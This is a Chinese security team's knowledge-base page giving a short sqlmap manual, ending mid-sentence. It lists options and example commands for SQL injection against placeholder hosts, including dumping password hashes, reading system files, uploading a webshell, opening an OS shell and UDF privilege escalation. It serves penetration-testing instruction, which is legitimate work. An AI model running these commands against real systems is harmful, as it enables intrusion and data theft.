<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <title>sqlmap简要手册 | 狼组安全团队公开知识库</title>
    <meta name="description" content="">
    <meta name="generator" content="VuePress 1.7.1">
    <link rel="icon" href="/assets/logo.svg">
    <script type="text/javascript" src="/assets/js/push.js"></script>
    <meta name="description" content="致力于打造信息安全乌托邦">
    <meta name="referrer" content="never">
    <meta name="keywords" content="知识库,公开知识库,狼组,狼组安全团队知识库,knowledge">
    <link rel="preload" href="/assets/css/0.styles.32ca519c.css" as="style"><link rel="preload" href="/assets/js/app.f7464420.js" as="script"><link rel="preload" href="/assets/js/2.26207483.js" as="script"><link rel="preload" href="/assets/js/70.9fb74c80.js" as="script"><link rel="prefetch" href="/assets/js/10.55514509.js"><link rel="prefetch" href="/assets/js/11.ec576042.js"><link rel="prefetch" href="/assets/js/12.a5584a2f.js"><link rel="prefetch" href="/assets/js/13.c9f84b2e.js"><link rel="prefetch" href="/assets/js/14.d2a5440c.js"><link rel="prefetch" href="/assets/js/15.2f271296.js"><link rel="prefetch" href="/assets/js/16.0895ce42.js"><link rel="prefetch" href="/assets/js/17.627e2976.js"><link rel="prefetch" href="/assets/js/18.73745a4c.js"><link rel="prefetch" href="/assets/js/19.19350186.js"><link rel="prefetch" href="/assets/js/20.e4eac589.js"><link rel="prefetch" href="/assets/js/21.fc0657ba.js"><link rel="prefetch" href="/assets/js/22.f4a1220f.js"><link rel="prefetch" href="/assets/js/23.c8cce92d.js"><link rel="prefetch" href="/assets/js/24.46225ec2.js"><link rel="prefetch" href="/assets/js/25.9b6d75e4.js"><link rel="prefetch" href="/assets/js/26.288f535e.js"><link rel="prefetch" href="/assets/js/27.865bdc75.js"><link rel="prefetch" href="/assets/js/28.f4224fef.js"><link rel="prefetch" href="/assets/js/29.6393a40b.js"><link rel="prefetch" href="/assets/js/3.a509f503.js"><link rel="prefetch" href="/assets/js/30.d5a49f97.js"><link rel="prefetch" href="/assets/js/31.eb3647df.js"><link rel="prefetch" href="/assets/js/32.7f48a571.js"><link rel="prefetch" href="/assets/js/33.1f374ffa.js"><link rel="prefetch" href="/assets/js/34.5a911179.js"><link rel="prefetch" href="/assets/js/35.d2bcc7ef.js"><link rel="prefetch" href="/assets/js/36.42e440bd.js"><link rel="prefetch" href="/assets/js/37.dedbbdea.js"><link rel="prefetch" href="/assets/js/38.d68d1f69.js"><link rel="prefetch" href="/assets/js/39.e278f860.js"><link rel="prefetch" href="/assets/js/4.35636da8.js"><link rel="prefetch" href="/assets/js/40.97f4e937.js"><link rel="prefetch" href="/assets/js/41.38630688.js"><link rel="prefetch" href="/assets/js/42.cae56aa5.js"><link rel="prefetch" href="/assets/js/43.61a04b16.js"><link rel="prefetch" href="/assets/js/44.5c6230f2.js"><link rel="prefetch" href="/assets/js/45.0f1355ae.js"><link rel="prefetch" href="/assets/js/46.c1906649.js"><link rel="prefetch" href="/assets/js/47.7ae220ce.js"><link rel="prefetch" href="/assets/js/48.59af224e.js"><link rel="prefetch" href="/assets/js/49.6a33a171.js"><link rel="prefetch" href="/assets/js/5.08ab40ee.js"><link rel="prefetch" href="/assets/js/50.f14601d2.js"><link rel="prefetch" href="/assets/js/51.f20841fd.js"><link rel="prefetch" href="/assets/js/52.fb0a5327.js"><link rel="prefetch" href="/assets/js/53.8013048c.js"><link rel="prefetch" href="/assets/js/54.d132c2f8.js"><link rel="prefetch" href="/assets/js/55.87aa8b5d.js"><link rel="prefetch" href="/assets/js/56.161f38ad.js"><link rel="prefetch" href="/assets/js/57.bd6a2ef2.js"><link rel="prefetch" href="/assets/js/58.8a69f15a.js"><link rel="prefetch" href="/assets/js/59.93c0e2de.js"><link rel="prefetch" href="/assets/js/6.fda5ce3a.js"><link rel="prefetch" href="/assets/js/60.10091d44.js"><link rel="prefetch" href="/assets/js/61.cd1e3b10.js"><link rel="prefetch" href="/assets/js/62.9c0ad8c5.js"><link rel="prefetch" href="/assets/js/63.4a8dd9d2.js"><link rel="prefetch" href="/assets/js/64.6bf3fede.js"><link rel="prefetch" href="/assets/js/65.7a2ccc50.js"><link rel="prefetch" href="/assets/js/66.874d563b.js"><link rel="prefetch" href="/assets/js/67.bb86eab2.js"><link rel="prefetch" href="/assets/js/68.c1db2a2b.js"><link rel="prefetch" href="/assets/js/69.8141480b.js"><link rel="prefetch" href="/assets/js/7.d1fe6bef.js"><link rel="prefetch" href="/assets/js/71.d1e4e9ab.js"><link rel="prefetch" href="/assets/js/72.e6bf83fb.js"><link rel="prefetch" href="/assets/js/73.6dd6c980.js"><link rel="prefetch" href="/assets/js/74.3612ba47.js"><link rel="prefetch" href="/assets/js/75.6e1a2434.js"><link rel="prefetch" href="/assets/js/76.5bfa4bcc.js"><link rel="prefetch" href="/assets/js/77.784df031.js"><link rel="prefetch" href="/assets/js/78.aa94a0a0.js"><link rel="prefetch" href="/assets/js/79.c4e9a4f2.js"><link rel="prefetch" href="/assets/js/8.63fd05d7.js"><link rel="prefetch" href="/assets/js/80.8d47d1f7.js"><link rel="prefetch" href="/assets/js/81.1160b022.js"><link rel="prefetch" href="/assets/js/82.7d17e5c8.js"><link rel="prefetch" href="/assets/js/83.a2ff144a.js"><link rel="prefetch" href="/assets/js/84.53d29383.js"><link rel="prefetch" href="/assets/js/9.b49161a4.js">
    <link rel="stylesheet" href="/assets/css/0.styles.32ca519c.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container"><header class="navbar"><div class="ant-row"><div class="nav-button"><i aria-label="icon: bars" class="anticon anticon-bars"><svg viewBox="0 0 1024 1024" focusable="false" data-icon="bars" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M912 192H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zM104 228a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0z"></path></svg></i> <span></span></div> <div class="ant-col ant-col-xs-24 ant-col-sm-24 ant-col-md-6 ant-col-lg-5 ant-col-xl-5 ant-col-xxl-4"><a href="/" class="router-link-active home-link"><img src="/assets/logo.svg" alt="狼组安全团队公开知识库" class="logo"> <span class="site-name">狼组安全团队公开知识库</span></a> <div class="search-box mobile-search"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div></div> <div class="ant-col ant-col-xs-0 ant-col-sm-0 ant-col-md-18 ant-col-lg-19 ant-col-xl-19 ant-col-xxl-20"><div class="search-box"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div> <nav class="nav-links can-hide"><ul role="menu" id="nav" class="ant-menu ant-menu-horizontal ant-menu-root ant-menu-light"><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/" class="router-link-active">
          首页
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/guide/">
          使用指南
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/knowledge/" class="router-link-active">
          知识库
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/opensource/">
          开源项目
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="visibility:hidden;position:absolute;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li></ul> <a href="https://github.com/wgpsec" target="_blank" rel="noopener noreferrer" class="repo-link"><i aria-label="icon: github" class="anticon anticon-github"><svg viewBox="64 64 896 896" focusable="false" data-icon="github" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M511.6 76.3C264.3 76.2 64 276.4 64 523.5 64 718.9 189.3 885 363.8 946c23.5 5.9 19.9-10.8 19.9-22.2v-77.5c-135.7 15.9-141.2-73.9-150.3-88.9C215 726 171.5 718 184.5 703c30.9-15.9 62.4 4 98.9 57.9 26.4 39.1 77.9 32.5 104 26 5.7-23.5 17.9-44.5 34.7-60.8-140.6-25.2-199.2-111-199.2-213 0-49.5 16.3-95 48.3-131.7-20.4-60.5 1.9-112.3 4.9-120 58.1-5.2 118.5 41.6 123.2 45.3 33-8.9 70.7-13.6 112.9-13.6 42.4 0 80.2 4.9 113.5 13.9 11.3-8.6 67.3-48.8 121.3-43.9 2.9 7.7 24.7 58.3 5.5 118 32.4 36.8 48.9 82.7 48.9 132.3 0 102.2-59 188.1-200 212.9a127.5 127.5 0 0 1 38.1 91v112.5c.8 9 0 17.9 15 17.9 177.1-59.7 304.6-227 304.6-424.1 0-247.2-200.4-447.3-447.5-447.3z"></path></svg></i></a></nav></div></div> <!----></header> <aside class="sidebar"><div><div class="promo"><div id="promo_3"><div class="promo_title">赞助商</div> <button type="button" class="ant-btn ant-btn-primary ant-btn-background-ghost"><span>成为赞助商</span></button></div></div> <div role="separator" id="reset-margin" class="ant-divider ant-divider-horizontal ant-divider-dashed"></div></div> <ul class="sidebar-links"><li><a href="/knowledge/" aria-current="page" title="知识库广告位招租" class="sidebar-link">知识库广告位招租</a></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>CTF</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>基础知识</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading open"><span>工具手册</span> <span class="arrow down"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <ul class="sidebar-links sidebar-group-items"><li><a href="/knowledge/tools/nmap.html" title="nmap端口扫描" class="sidebar-link">nmap端口扫描</a></li><li><a href="/knowledge/tools/sqlmap.html" aria-current="page" title="sqlmap简要手册" class="active sidebar-link">sqlmap简要手册</a></li><li><a href="/knowledge/tools/metasploit.html" title="Metasploit漏洞利用框架" class="sidebar-link">Metasploit漏洞利用框架</a></li><li><a href="/knowledge/tools/burpsuite.html" title="BurpSuite简要手册" class="sidebar-link">BurpSuite简要手册</a></li><li><a href="/knowledge/intranet/Cobalt-Strike.html" title="Cobalt Strike" class="sidebar-link">Cobalt Strike</a></li><li><a href="/knowledge/intranet/Aggressor-script.html" title="Aggressor-Script" class="sidebar-link">Aggressor-Script</a></li></ul></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>Web安全</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>攻防对抗</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>代码审计</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li></ul></aside> <main class="page"> <div class="theme-antdocs-content content__default"><h1 id="sqlmap简介">sqlmap简介 <a href="#sqlmap简介" class="header-anchor">#</a></h1> <p><strong>当给sqlmap一个URL，它会干些什么？</strong></p> <blockquote><p>1）判断可注入的参数</p> <p>2）判断可以用那种SQL注入技术来注入</p> <p>3）识别出哪种数据库</p> <p>4）根据用户选择，读取哪些数据</p></blockquote> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>--purge		<span class="token comment">#清除历史缓存</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h1 id="选项摘要">选项摘要 <a href="#选项摘要" class="header-anchor">#</a></h1> <h4 id="输出信息的详细程度"><strong>输出信息的详细程度</strong> <a href="#输出信息的详细程度" class="header-anchor">#</a></h4> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>-v	<span class="token comment">#共7个级别(0~6)，默认为1</span>
<span class="token comment">#可以用 -vv 代替 -v 2，推荐使用这种方法</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><ul><li><strong>0</strong>：只输出 Python 出错回溯信息，错误和关键信息</li> <li><strong>1</strong>：增加输出普通信息和警告信息</li> <li><strong>2</strong>：增加输出调试信息</li> <li><strong>3</strong>：增加输出已注入的 payloads</li> <li><strong>4</strong>：增加输出 HTTP 请求</li> <li><strong>5</strong>：增加输出 HTTP 响应头</li> <li><strong>6</strong>：增加输出 HTTP 响应内容</li></ul> <h4 id="目标"><strong>目标</strong> <a href="#目标" class="header-anchor">#</a></h4> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>-d	<span class="token comment">#直连数据库，&quot;mysql://root:root@192.168.0.8:3306/testdb&quot;</span>
-u URL
-l	<span class="token comment">#从Burp代理日志文件中解析目标地址</span>
-m	<span class="token comment">#从文本文件中批量获取目标</span>
-r	<span class="token comment">#从文件中读取 HTTP 请求</span>

--purge			<span class="token comment">#清除历史缓存</span>
--flush-session	<span class="token comment">#清除上次扫描的缓存</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><h4 id="请求"><strong>请求</strong> <a href="#请求" class="header-anchor">#</a></h4> <p>指定连接目标地址的方式</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>--method<span class="token operator">=</span>METHOD		<span class="token comment">#强制使用提供的 HTTP 方法（例如：PUT）</span>
--data<span class="token operator">=</span>DATA			<span class="token comment">#使用 POST 发送数据串；--data=&quot;id=1&amp;user=admin&quot;</span>
--param-del<span class="token operator">=</span><span class="token string">&quot;;&quot;</span>		<span class="token comment">#使用参数分隔符，--data=&quot;id=1;user=admin&quot;</span>
--cookie<span class="token operator">=</span>COOKIE		<span class="token comment">#指定 HTTP Cookie ，--cookie &quot;id=11&quot; --level 2</span>
--drop-set-cookie	<span class="token comment">#忽略 HTTP 响应中的 Set-Cookie 参数</span>
--user-agent<span class="token operator">=</span>AGENT	<span class="token comment">#指定 HTTP User-Agent</span>
--random-agent		<span class="token comment">#使用随机的 HTTP User-Agent，随机从 ./txt/user-agents.txt 选一个，不是每次请求换一个</span>
--referer<span class="token operator">=</span>REFERER	<span class="token comment">#指定 HTTP Referer</span>
-H HEADER			<span class="token comment">#设置额外的 HTTP 头参数（例如：&quot;X-Forwarded-For: 127.0.0.1&quot;）</span>
--headers<span class="token operator">=</span>HEADERS	<span class="token comment">#设置额外的 HTTP 头参数,必须以换行符分隔（例如：&quot;Accept-Language: fr\nETag: 123&quot;）</span>
--delay<span class="token operator">=</span><span class="token number">10</span>			<span class="token comment">#设置每个 HTTP 请求的延迟秒数</span>
--safe-freq<span class="token operator">=</span>SAFE	<span class="token comment">#每访问两次给定的合法 URL 才发送一次测试请求</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br></div></div><h4 id="注入"><strong>注入</strong> <a href="#注入" class="header-anchor">#</a></h4> <p>以下选项用于指定要测试的参数</p> <p>提供自定义注入 payloads 和篡改参数的脚本</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>-p TESTPARAMETER	<span class="token comment">#指定需要测试的参数</span>
--skip<span class="token operator">=</span>SKIP			<span class="token comment">#指定要跳过的参数</span>
--dbms<span class="token operator">=</span>DBMS			<span class="token comment">#指定 DBMS 类型（例如：MySQL）</span>
--os<span class="token operator">=</span>OS				<span class="token comment">#指定 DBMS 服务器的操作系统类型</span>
--prefix<span class="token operator">=</span>PREFIX		<span class="token comment">#注入 payload 的前缀字符串</span>
--suffix<span class="token operator">=</span>SUFFIX		<span class="token comment">#注入 payload 的后缀字符串</span>
--tamper<span class="token operator">=</span>TAMPER		<span class="token comment">#用给定脚本修改注入数据</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><h4 id="检测"><strong>检测</strong> <a href="#检测" class="header-anchor">#</a></h4> <p>sqlmap 使用的 payloads 直接从文本文件 <code>xml/payloads.xml</code> 中载入。</p> <p>根据该文件顶部的相关指导说明进行设置，如果 sqlmap 漏过了特定的注入，</p> <p>你可以选择自己修改指定的 payload 用于检测。</p> <p><strong>level有5级，越高检测越全，默认为 1</strong></p> <blockquote><p>--level 1	检测Get和Post</p> <p>--level 2	检测HTTP Cookie</p> <p>--level 3	检测User-Agent和Referer</p> <p>--level 4	检测</p> <p>--level 5	检测 HOST 头</p></blockquote> <p><strong>risk有3级，级别越高风险越大，默认为1</strong></p> <blockquote><p>--risk 2	 会在默认的检测上添加大量时间型盲注语句测试</p> <p>--risk 3	 会在原基础上添加<code>OR</code> 类型的布尔型盲注 ，可能会update导致修改数据库</p></blockquote> <h4 id="技术"><strong>技术</strong> <a href="#技术" class="header-anchor">#</a></h4> <p>以下选项用于调整特定 SQL 注入技术的测试方法</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>--technique<span class="token operator">=</span>TECH	<span class="token comment">#使用的 SQL 注入技术（默认为“BEUSTQ”)</span>
B: Boolean-based blind SQL injection（布尔型盲注）
E: Error-based SQL injection（报错型注入）
U: UNION query SQL injection（联合查询注入）
S: Stacked queries SQL injection（堆查询注入）
T: Time-based blind SQL injection（时间型盲注）
Q: inline Query injection（内联查询注入）

--time-sec<span class="token operator">=</span>TIMESEC  <span class="token comment">#设置延时注入的时间（默认为 5）</span>
--second-order<span class="token operator">=</span>S<span class="token punctuation">..</span>  <span class="token comment">#设置二阶响应的结果显示页面的 URL（该选项用于二阶 SQL 注入）</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br></div></div><h4 id="枚举"><strong>枚举</strong> <a href="#枚举" class="header-anchor">#</a></h4> <p>以下选项用于获取数据库的信息，结构和数据表中的数据。</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>-a, --all          <span class="token comment">#获取所有信息、数据</span>
-b, --banner        <span class="token comment">#获取 DBMS banner,返回数据库的版本号</span>
--current-user			<span class="token comment">#获取 DBMS 当前用户</span>
--current-db			<span class="token comment">#获取 DBMS 当前数据库</span>
--hostname				<span class="token comment">#获取 DBMS 服务器的主机名</span>
--is-dba				<span class="token comment">#探测 DBMS 当前用户是否为 DBA（数据库管理员）</span>
--users					<span class="token comment">#枚举出 DBMS 所有用户</span>
--passwords				<span class="token comment">#枚举出 DBMS 所有用户的密码哈希</span>
--privileges			<span class="token comment">#枚举出 DBMS 所有用户特权级</span>
--roles					<span class="token comment">#枚举出 DBMS 所有用户角色</span>

--dbs					<span class="token comment">#枚举出 DBMS 所有数据库</span>
--tables				<span class="token comment">#枚举出 DBMS 数据库中的所有表</span>
--columns				<span class="token comment">#枚举出 DBMS 表中的所有列</span>
--schema				<span class="token comment">#枚举出 DBMS 所有模式</span>
--count					<span class="token comment">#获取数据表数目</span>
--dump					<span class="token comment">#导出 DBMS 数据库表项</span>
--stop <span class="token number">10</span>				<span class="token comment">#只取前10行数据</span>
    
-D DB					<span class="token comment">#指定要枚举的 DBMS 数据库</span>
-T TBL					<span class="token comment">#指定要枚举的 DBMS 数据表</span>
-C COL					<span class="token comment">#指定要枚举的 DBMS 数据列</span>
    
--sql-query<span class="token operator">=</span>QUERY		<span class="token comment">#指定要执行的 SQL 语句</span>
--sql-shell				<span class="token comment">#调出交互式 SQL shell</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br><span class="line-number">24</span><br><span class="line-number">25</span><br></div></div><h1 id="用例">用例 <a href="#用例" class="header-anchor">#</a></h1> <p><strong>从文件读取HTTP请求，GET和POST都可以</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>sqlmap -r <span class="token string">&quot;burp.txt&quot;</span> -p <span class="token string">&quot;username&quot;</span>	<span class="token comment">#-p 指定存在注入的参数</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>Cookie注入</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>sqlmap -u <span class="token string">&quot;http://www.vuln.com&quot;</span> --cookie <span class="token string">&quot;id=11&quot;</span> --level <span class="token number">2</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>当防火墙，对请求速度做了限制</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>sqlmap -u <span class="token string">&quot;http://www.vuln.com/post.php?id=1&quot;</span> --delay<span class="token operator">=</span><span class="token number">10</span>
<span class="token comment">#在每个HTTP请求之间的延迟10秒</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><h2 id="伪静态注入">伪静态注入 <a href="#伪静态注入" class="header-anchor">#</a></h2> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>sqpmap  -u http://victim.com/id/666*.html --dbs  <span class="token comment">#在html扩展名前加个'*'</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h2 id="访问文件系统">访问文件系统 <a href="#访问文件系统" class="header-anchor">#</a></h2> <p>仅对MySQL、MSSQL、PosgreSQL有效</p> <p>数据库用户有读写权限，有目录读写文件权限</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>sqlmap -u url --is-dba
<span class="token comment">#查看是否dba权限,必须为root权限</span>

sqlmap -u url --file-read <span class="token string">&quot;C:/Windows/win.ini&quot;</span>		
<span class="token comment">#读取文件</span>

sqlmap -u url --file-write<span class="token operator">=</span>D:/shell.php --file-dest<span class="token operator">=</span>C:/www/shell.php
<span class="token comment">#上传文件 (本地木马路径:目标网站目录)</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><h2 id="接管操作系统">接管操作系统 <a href="#接管操作系统" class="header-anchor">#</a></h2> <p>仅对MySQL、MSSQL、PosgreSQL有效</p> <p>数据库用户有读写权限，有目录读写文件权限</p> <p>sqlmap 能够在<strong>数据库所在服务器的操作系统上运行任意的命令</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>sqlmap -u <span class="token string">&quot;URL&quot;</span> --os-shell	<span class="token comment">#获取系统交互shell或--os-cmd=id执行系统命令</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><a href="https://blog.sari3l.com/posts/8dea0d95/" target="_blank" rel="noopener noreferrer">原理<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>就是上传一个upload木马后，再上传一个cmd shell；</p> <p>当 --os-shell 退出后， 会调用后门脚本删除上传文件后，进行自删除。</p> <blockquote><p>在 MySQL 和 PostgreSQL 中，sqlmap 可以上传一个包含两个用户自定义函数</p> <p>分别为 <code>sys_exec()</code> 和 <code>sys_eval()</code> 的共享库（二进制文件）</p> <p>然后在数据库中创建出两个对应函数，并调用对应函数执行特定的命令，并允许用户选择是否打印出相关命令执行的结果。</p> <p>在 Microsoft SQL Server 中，sqlmap 会利用 <code>xp_cmdshell</code> 存储过程：</p> <p>如果该存储过程被关闭了（Microsoft SQL Server 的 2005 及以上版本默认关闭），sqlmap 则会将其重新打开；</p> <p>如果该存储过程不存在，sqlmap 则会重新创建它。</p> <p>当用户请求标准输出，sqlmap 将使用任何可用的 SQL 注入技术（盲注、带内注入、报错型注入）去获取对应结果。</p> <p>相反，如果无需标准输出对应结果，sqlmap 则会使用堆叠查询注入（Stacked queries）技术执行相关的命令。</p> <p>如果堆叠查询没有被 Web 应用识别出来，并且 DBMS 为 MySQL，</p> <p>假如后端 DBMS 和 Web 服务器在同一台服务器上，</p> <p>则仍可以通过利用 <code>SELECT</code> 语句中的 <code>INTO OUTFILE</code>，在 根目录可写目录中写shell</p></blockquote> <h2 id="udf提权">UDF提权 <a href="#udf提权" class="header-anchor">#</a></h2> <p>使用选项 <code>--udf-inject</code> 并按照说明进行操作即可；</p> <p>如果需要，也可以使用 <code>--shared-lib</code> 选项通过命令行指定共享库的本地文件系统路径。</p> <p>否则 sqlmap 